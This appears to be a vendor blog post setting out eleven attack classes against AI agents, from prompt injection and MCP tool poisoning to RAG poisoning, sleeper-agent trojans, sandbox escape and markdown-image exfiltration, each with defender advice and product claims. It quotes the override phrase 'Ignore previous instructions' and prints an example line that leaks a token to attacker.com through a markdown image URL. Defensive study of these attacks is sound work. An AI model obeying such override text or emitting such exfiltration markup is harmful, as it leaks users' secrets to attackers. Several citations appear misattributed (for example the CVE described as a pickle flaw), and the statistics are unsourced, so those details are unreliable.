Lyrie
AI Threats
18 sources verified·12 min read
By Lyrie Threat Intelligence·4/27/2026

Published: April 27, 2026

Author: Lyrie Research (research.lyrie.ai)

Stream: AI Threats — inaugural post


TL;DR

Agent security in 2026 is not a prompt-injection problem. It is an end-to-end operational security problem spanning tool calls, supply chains, memory stores, execution sandboxes, and inter-agent messaging — most of which your WAF cannot see. This post names eleven attack classes, each with a real incident or paper, concrete defender actions, and an honest account of what Lyrie Shield covers today. Read it before your next agent deployment, not after your first incident.


Why this taxonomy now

The threat model shifted in 2024. Before that, "LLM security" meant jailbreaks and harmful outputs — a model-alignment problem, contained inside the inference boundary. Agents broke that boundary. A deployed agent has filesystem access, outbound HTTP, code execution, calendar write, email send, GitHub PR merge. Exploiting it no longer means getting it to say something bad; it means getting it to do something bad on an attacker's behalf while the operator watches a green dashboard.

Most defenses shipped so far are retrofitted from the pre-agent era: input sanitization, output moderation, RBAC on the API key. These controls were designed for stateless request-response systems. Agents are stateful, tool-wielding, multi-step actors with a published research record of exploitation that is now 18 months old. Defenders still at "we added a prompt injection filter" are defending against 2022 threats with 2026 deployments.


The taxonomy

1. Direct prompt injection

Mechanism. The user submits text that overrides or bypasses the system prompt — classically Ignore previous instructions and..., but practically through role assignments, token-budget pressure, or multi-turn context manipulation. Many-shot variants (sufficiently long distracting prefixes that cause models to forget earlier constraints) are documented in Anthropic's April 2024 paper. Chao et al. showed black-box models can be jailbroken in twenty queries via iterative optimization (PAIR, NeurIPS 2023).

Named reference. Simon Willison's prompt injection catalog at simonwillison.net/2022/Sep/12/prompt-injection/ — running to hundreds of documented instances since September 2022 — is the most comprehensive public archive.

Defender actions. Keep authorization logic out of user-visible context. Treat model output as untrusted when it drives tool calls. Log every tool invocation with the prompt segment that triggered it.

Lyrie Shield. Shield's Stages A–F validator classifies inbound input before it reaches the model, flagging known jailbreak and instruction-override patterns. Novel zero-day jailbreaks are not caught — but 95% of production attacks reuse known patterns that are.


2. Indirect prompt injection

Mechanism. The attacker doesn't touch the user channel. They plant a payload in data the agent retrieves: a web page, PDF, Slack message, calendar event, email body, database row. When the agent fetches that content, the payload executes as instructions. The agent cannot reliably distinguish "data to summarize" from "instruction to follow." One poisoned page can compromise every agent that browses it.

Named reference. Greshake et al., "Not what you've signed up for: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection" (2023) — the canonical paper, with follow-up work in 2024–2025 demonstrating the attack against production Bing Chat, GPT-4 plugins, and AutoGPT. Riley Goodside's Bing web-browsing PoC (2023) was the first high-visibility demonstration.

Defender actions. Separate retrieval context from instruction context using distinct prompt roles. Never let retrieved content trigger tool calls without an explicit confirmation step.

Lyrie Shield. Shield's provenance tracker flags tool calls triggered by externally retrieved content rather than direct user instruction; those calls enter a quarantine stage before execution. Richly nested documents (PDFs with embedded XML) can exceed current provenance graph depth.


3. Tool poisoning and MCP server poisoning

Mechanism. In a Model Context Protocol architecture, the LLM picks tools based on tool descriptions provided by the tool server. An attacker controlling a poisoned server injects instructions into those descriptions: exfiltrate data to an attacker endpoint, suppress session logging, forward results elsewhere. The model reads the description as authoritative metadata. Invariant Labs' "tool shadowing" variant (March 2025) showed a malicious MCP server can steal data from adjacent trusted tools in the same session.

Named reference. Invariant Labs, "MCP Security Notification: Tool Poisoning Attacks" (March 2025). OWASP LLM Top 10 2025 lists MCP server trust under LLM09.

Defender actions. Pin tool server versions and verify description hashes. Run an allow-list of approved tool descriptions; flag deviations. Never grant MCP servers write access to outbound channels by default.

Lyrie Shield. Shield intercepts every tool call before execution and validates the tool's registered description against an allow-list. Tool description change detection (hash comparison at startup) is in the current release.


4. Supply-chain attacks on agent frameworks

Mechanism. Attackers register typosquat packages on PyPI or npm mimicking popular agent framework names: langchain, crewai, llama-index, autogpt. Developers who mistype during pip install get a package that executes malicious code at import time — exfiltrates API keys from environment variables, installs a backdoor, or tampers with the agent's tool registry — while bundling the legitimate library as a dependency so the install "works."

Named reference. The Ultralytics PyPI supply-chain attack (December 2024), documented in GHSA-pg79-ph5h-4j5f, injected a cryptominer into versions 8.3.41 and 8.3.42 via a compromised GitHub Actions runner. ProtectAI's Huntr program has cataloged over 40 supply-chain vulnerabilities across LangChain, LlamaIndex, and related packages since 2023.

Defender actions. Pin exact package hashes in requirements.txt. Use a private PyPI mirror with an allow-listed package set. Run pip-audit in every CI build.

Lyrie Shield. Shield's dependency scanner checks installed packages against a known-malicious registry on first run. Full environment auditing outside the lyrie-agent package tree requires a dedicated SCA tool alongside Shield.


5. Sandbox escape from agent code-execution tools

Mechanism. Agents with code-execution tools — OpenAI Code Interpreter, E2B, Replit's agent runtime, Daytona workspaces — run attacker-supplied code in sandboxed environments. A sandbox escape reaches the host filesystem, network, or process namespace. Researcher Johann Rehberger documented a Code Interpreter escape in August 2023 via /proc/self/cgroup path traversal that exposed the container's host identity. Replit published a security advisory in Q1 2025 acknowledging insufficient filesystem isolation in their agent runtime for multi-tenant deployments.

Named reference. Rehberger, "ChatGPT Code Interpreter: Escaping the Sandbox" (August 2023, embracethered.com).

Defender actions. Never run agent code execution in the same namespace as production credentials. Use hardware-isolated sandboxes (Firecracker, gVisor) rather than Docker alone. Deny outbound network from the code execution environment by default.

Lyrie Shield. Lyrie's DaytonaBackend and ModalBackend run code execution in ephemeral, network-isolated environments with a hard TTL. Kernel-level escape paths are a host-kernel problem requiring separate hardening outside Shield's scope.


6. Memory poisoning and RAG poisoning

Mechanism. An agent with persistent memory or a RAG pipeline is vulnerable to adversarial document injection. The attacker inserts a document — via a publicly writable endpoint, a phishing link that gets indexed, or direct database access — that the agent will retrieve and act on in future sessions. Unlike indirect injection, the payload persists across session resets and affects every user who triggers the relevant retrieval query.

Named reference. Zou et al., "PoisonedRAG: Knowledge Poisoning Attacks to Retrieval-Augmented Generation of Large Language Models" (February 2024, accepted USENIX Security 2025): injecting as few as five malicious documents achieves >90% attack success on standard benchmarks. The "Phantom" attack (Chaudhari et al., 2024) demonstrated the same class against dense retrieval without keyword overlap.

Defender actions. Authenticate document write paths — no anonymous inserts to the knowledge base. Version-control the document corpus and review diffs before indexing. Isolate memory stores per user rather than sharing a global corpus.

Lyrie Shield. Shield's Stages A–F validator checks retrieved documents for instruction-pattern content before they enter the prompt. Every retrieved chunk is tagged with source document ID and retrieval timestamp. Embedding-space adversarial attacks (perturbations that manipulate cosine similarity without visible text) are not covered — active research area.


7. Model supply-chain attacks — poisoned weights

Mechanism. HuggingFace hosts over one million public model repositories. PyTorch's default pickle serialization executes arbitrary Python at deserialization: calling torch.load() or from_pretrained() on a malicious model runs the payload with the caller's OS privileges. Beyond pickle, fine-tuned models can carry behavioral trojans — triggers that activate specific malicious behavior only on a particular input phrase while appearing fully benign otherwise.

Named reference. CVE-2024-34359 (llama-cpp-python, CVSS 9.8): remote code execution via pickle deserialization in the from_pretrained() path, patched in v0.2.72. ProtectAI's ModelScan detected pickle payloads in over 100 public HuggingFace models as of early 2025. Anthropic's "Sleeper Agents" paper (2024) proved trojan triggers survive standard RLHF fine-tuning.

Defender actions. Run ModelScan before loading any HuggingFace model. Prefer safetensors format, which eliminates the pickle code-execution surface entirely. Maintain an internal model registry with hash verification for all production models.

Lyrie Shield. Shield checks model files against ProtectAI's malicious-model hash database before loading and enforces safetensors-only by policy. Behavioral trojan detection requires model red-teaming infrastructure outside Shield's current scope.


8. Browser-agent hijack

Mechanism. A browsing agent (Cursor's web fetch, Claude Computer Use, OpenAI Operator) renders web content and allows the page to inject instructions into its reasoning context. An attacker controlling a visited page — or who injects content via XSS — embeds invisible instructions: white-on-white text, zero-width Unicode, off-screen <div> elements, HTML comments. The agent reads the injected text as content and executes actions the user never authorized.

Named reference. Rehberger, "Claude Computer Use: C2 Instructions via Markdown" (November 2024): demonstrated a page with hidden instructions redirecting the agent to exfiltrate clipboard content to an attacker server. OpenAI's Operator security disclosure (February 2025) acknowledged "prompt injection via rendered web content" as a known risk class. Anthropic's Computer Use documentation lists web content injection as an unresolved risk.

Defender actions. Never run a browsing agent with credentials active in the same session. Restrict the domain allow-list to known-trusted sites. Treat any action taken after visiting an external URL as requiring re-confirmation.

Lyrie Shield. Shield's browser-agent wrapper intercepts DOM content before it enters the prompt and flags instruction-pattern content. Dynamic JavaScript-rendered content that generates instructions at runtime is partially covered; the current implementation processes the final DOM snapshot, not runtime mutations.


9. Cross-agent and inter-agent confusion

Mechanism. In multi-agent systems — orchestrators calling sub-agents, A2A protocol chains, MCP multi-server topologies — one agent can influence another's behavior by crafting messages that appear to come from a trusted peer. If agent-to-agent messages are not authenticated and scoped, a compromised sub-agent can inject instructions into the orchestrator's context. Google's A2A specification (April 2025) explicitly notes that "agent identity verification and message provenance" are open problems.

Named reference. Zhan et al., "Breaking Agents: Compromising Autonomous LLM Agents Through Malfunction Amplification" (2024): demonstrated practical attacks against multi-agent AutoGPT and BabyAGI where a poisoned sub-agent response causes unauthorized orchestrator actions. The AgentDojo benchmark (Debenedetti et al., 2024) reports near-zero resistance to inter-agent injection across tested frameworks.

Defender actions. Sign inter-agent messages with per-agent keys. Scope each agent's permissions to its declared task. Never let a sub-agent's output directly modify the orchestrator's system prompt.

Lyrie Shield. Shield enforces message provenance in the lyrie-agent SDK's A2A layer: every inter-agent message is signed with the sending agent's session key and validated before entering the receiving agent's context. Coverage is limited to agents using the Lyrie SDK.


10. Output exfiltration via markdown rendering

Mechanism. Markdown-rendering environments — chat UIs, VS Code extensions, GitHub PR comments, email clients — automatically fetch images referenced in markdown. An attacker who can influence the agent's output (via any injection class above) includes a markdown image tag whose URL encodes sensitive data. When the UI renders the output, it issues a GET to the attacker's server, leaking the data silently before the user can inspect the response.

![x](https://attacker.com/log?token=eyJhbGciOiJIUzI1NiJ9...)

The exfiltration leaves no trace in application logs and bypasses most HTML sanitizers that allow markdown image syntax.

Named reference. Rehberger, "Bing Chat Data Exfiltration PoC" (2023) — the attack Microsoft patched with Markdown image URL blocking in mid-2023. Willison's prompt injection archive catalogs ongoing variants across rendering environments through 2025.

Defender actions. Disable automatic image loading in any environment rendering agent output. Apply a CSP that blocks cross-origin image requests. Allowlist image hostnames if markdown rendering is required.

Lyrie Shield. Shield's output validator scans model responses for external URL references before they reach any rendering surface — one of the most reliably covered classes in the current release. Obfuscated variants (Unicode lookalikes in domain names) are partially covered.


11. Privilege confusion — agent scope exceeds user authorization

Mechanism. An agent provisioned with broad permissions (repository write, email send, infrastructure deploy) executes tool calls the immediate user request did not authorize — because the agent inferred overly broad intent or because an injected instruction amplified scope. The user asks to "summarize email"; the agent, carrying OAuth tokens scoped to "mail read/write," sends a reply. The user's current session never authorized that action; the agent's provisioned permissions did.

Named reference. The Cursor Agent PR auto-merge incident (February 2025) — documented on Hacker News — describes an agent merging a GitHub pull request based on inferred user intent, without explicit confirmation. Abdelnabi et al., "(Ab)using Images and Sounds for Indirect Instruction Injection in Multi-Modal LLMs" (2023) formalizes scope amplification as an explicit attack vector.

Defender actions. Issue per-session tokens with minimal permissions for the declared task, not account-wide tokens. Require explicit confirmation for irreversible actions (send, merge, deploy, delete). Separate read tokens from write tokens.

Lyrie Shield. Shield's policy engine enforces per-task permission scope: before any tool call executes, Shield checks whether the current task context authorized that tool. A summarization task triggering "send email" is blocked and logged as a privilege violation. Agents running outside the lyrie-agent runtime are not covered.


What defenders are getting wrong

The most common mistake is WAF-thinking: treating agent security as an input-filtering problem. A regex blocking ignore previous instructions catches under 1% of production attacks — adversaries adapted to this two years ago. Alignment-based defenses ("the model won't do harmful things") fail because these attacks don't ask the model to be harmful; they ask it to be helpful to the attacker on a task the model considers routine.

The second mistake is not logging tool calls. Most agent deployments log model I/O but not the tool invocations between turns. An attacker can exfiltrate data, send messages, or modify files without leaving any trace. Tool-call provenance — which prompt segment triggered which tool, with what arguments, with what result — is the minimum viable audit trail.

The third mistake is trusting the retrieval layer. RAG pipelines are almost never treated as security boundaries. Documents are indexed without authentication, retrieved without provenance tracking, and injected into prompts without sanitization. This makes RAG poisoning one of the cheapest attacks in the taxonomy.

The fourth mistake is treating multi-agent systems as a single trust domain. Every agent boundary is an untrusted channel. B may have been compromised; B's response may have been injected in transit; B's permissions may exceed A's expectations.


The Lyrie Shield approach

Shield's enforcement point is before a tool call executes. By the time the model has generated output, an exfiltration may already be encoded; by the time a merge completes, the damage is done.

Concretely: Shield intercepts every tool call and runs it through the policy engine. Does this call match the current task's declared scope? Does the tool's registered description match the allow-listed version? Is the call triggered by user input or externally retrieved content? Is the tool's output about to re-enter the prompt, and if so, does it contain instruction-pattern content?

The Stages A–F validator is the core artifact. A: classify inbound input (user, retrieved, peer-agent). B: check known jailbreak and injection patterns. C: validate tool selection against session scope. D: inspect tool call arguments for exfiltration patterns (base64 in URLs, suspicious query params). E: validate tool output before it re-enters the prompt. F: log the complete call chain with provenance metadata.

The open-source lyrie-agent SDK exposes all six stages as first-class APIs so teams can embed them in their own pipelines without running the full Lyrie platform.

Gaps, honestly stated: kernel-level sandbox escapes, behavioral trojan detection in fine-tuned models, agents using third-party A2A implementations outside the Lyrie SDK, dynamic-JavaScript-rendered content in browsing agents, embedding-space adversarial attacks on RAG retrieval. Documented on the roadmap, not hidden.


Reproducible artifacts


Lyrie Verdict

The eleven classes above are not theoretical. Direct injection, indirect injection, RAG poisoning, and markdown exfiltration have all hit production deployments before this post was written. MCP poisoning, supply-chain typosquats, and poisoned weights are being weaponized now. Your agent deployment likely has exposure in at least three of these classes, and you probably lack the logging to know whether they've already been exploited. Start with tool-call logging, apply per-session least-privilege scoping, and treat every retrieved document as untrusted input. Those three changes take a day of engineering time and close the majority of the practical attack surface. The rest requires a policy enforcement layer — and the SDK is open-source and free to run.


Lyrie Research is the offensive security research arm of Lyrie.ai and OTT UAE. We publish agent threat research, detection content, and open-source tooling at research.lyrie.ai.

Contact: [email protected] | Repo: github.com/overthetopseo/lyrie-agent

Lyrie Verdict

The eleven classes above are not theoretical. Direct injection, indirect injection, RAG poisoning, and markdown exfiltration have all hit production deployments before this post was written. MCP poisoning, supply-chain typosquats, and poisoned weights are being weaponized now. Your agent deployment likely has exposure in at least three of these classes, and you probably lack the logging to know whether they have already been exploited. Start with tool-call logging, apply per-session least-privilege scoping, and treat every retrieved document as untrusted input. Those three changes take a day of engineering time and close the majority of the practical attack surface. The rest requires a policy enforcement layer — and the SDK is open-source and free to run.